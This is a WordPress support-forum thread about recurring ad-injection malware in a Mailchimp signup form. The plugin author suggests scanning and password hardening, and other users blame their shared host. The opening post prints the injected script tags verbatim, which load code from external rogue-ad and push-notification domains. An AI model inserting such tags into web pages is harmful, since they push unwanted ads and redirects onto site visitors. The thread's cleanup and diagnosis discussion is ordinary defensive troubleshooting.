Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:JS:GEN2?rogueads.unwanted_ads.1

  • Resolved sussexlongman

    (@sussexlongman)


    Hi, I’m having a problem with some malware that is being repeatedly added in front of a Mailchimp form. The script is creating links to external websites upon clicking on navigation links. A sucuri scan picks up the malware but your scanner does not at the moment. This is the Sucuri report:

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?rogueads.unwanted_ads.1
    
    </script><!-- MailChimp for WordPress v4.0.13 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-534" method="post" data-id="534" data-name="" ><div class="mc4wp-form-fields"><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

    I have removed the inserted code from the Mailchimp form several times which cleans the site but the code returns within a day or two so I presume there is malicious code elsewhere on the site doing this. Any help would be very much appreciated, thanks.

Viewing 15 replies - 1 through 15 (of 30 total)
  • Plugin Author Eli

    (@scheeeli)

    That is an old threat that is already in my definition updates. My plugin should be able to remove it along with any other threats that might be sustaining it. Can you show me a screenshot of what my plugin finds?

    If you want to contact me directly I can help more.

    Thanks for getting back. You can see a screenshot of what the plugin finds when this threat is active on the site at:

    https://www.dropbox.com/s/idtju1fhkb5ekwp/Anti-Malware%20Scan.png?dl=0

    How do I contact you directly?

    Plugin Author Eli

    (@scheeeli)

    I see that the threat is not there currently. Maybe it’s being planted on your site from another infected site on the same server.

    You can contact me directly here:
    eli AT gotmls DOT net

    Hi again, I contacted the web host and they said:

    Sucuri could detect javascript code injected in the database. Most of the other scanning softwares check just the files.

    Our Cloud websites are isolated from each other so it looks like the issue is the hacker still has access to your website. There could be other compromised files or they might guessed your passwords.

    Any thoughts?

    Plugin Author Eli

    (@scheeeli)

    have you done the usual password hardening: Change the DB_PASSWORD for your MySQL database and update the wp-config.php; check for and delete any rogue administrator users; change passwords for all users with elevated permissions; and scan all your local PCs for viruses and spyware that might be stealing your passwords.

    I am having this exact same problem. All plugin updated, files scanned for malware but the hack appears again hours later.

    Just away to change the db user details in hope that it works.

    @sussexlongman & @natepayne Can you please let me which hosting provider are you using? Because, I’m having same issue 🙁

    https://www.tsohost.com/ is who I am with for this site. It’s the only site affected and the only one hosted with TSO.

    I changed mysql username and password, updated all auth keys for wordpress and changed passwords for wordpress users.

    Also scanned all files for malware and nothing was reported.

    Since all of that the site has had this hack happen again – although this time the JS now redirects the website to another spam advert site.

    Also scanned the computers here in the office and all are clear of malware and viruses.

    • This reply was modified 2 years, 5 months ago by  natepayne. Reason: more info

    @natepayne I’m damn sure this problem is with TSO Host. My two website also hacked. I think there is something. I’m moving today to my own dedicated server.

    Is your database server 168.169.0.136?

    I am on 168.169.0.133…

    Damn, I am away to give them a call…

    My site is with Tsohost too, though I have others with them too that are unaffected. A few days ago, this was their response:

    ‘Our Cloud websites are isolated from each other so it looks like the issue is the hacker still has access to your website. There could be other compromised files or they might guessed your passwords.’

    I’ve deleted the Mailchimp plugin on my site and will embed a form using the Mailchimp’s code for a sign up form. I’ve had no repeat problems since but an still concerned that the malicious code may still be around.

    Let me know if you get anywhere with Tsohost.

    Hello @sussexlongman,

    I’ve moved my site to https://www.nawabhost.com, and from last night I feel safe there is no malware in my sites.

    I’ve contacted with TSO they replay me about WordPress 4.7.1 Rest API bug, but our all sites are running with 4.7.2, so there is no chance to get hacked.

    We have the same problem, but I don’t know why TSO Host ignoring this 🙁

    I have also contacted TSO and they have said this is “certainly not a server side vulnerability”.

    They were unable to find malware which to me means the issue has to be due to the server?

    The malware can’t found in the regular scan I think. It’s normal javascript file load ads from outside. TSO host tells me to hire secure or somebody who can clean my malware. If the server has security lackings then how I clean my site? My site again affected once the site is cleaned.

Viewing 15 replies - 1 through 15 (of 30 total)
  • The topic ‘MW:JS:GEN2?rogueads.unwanted_ads.1’ is closed to new replies.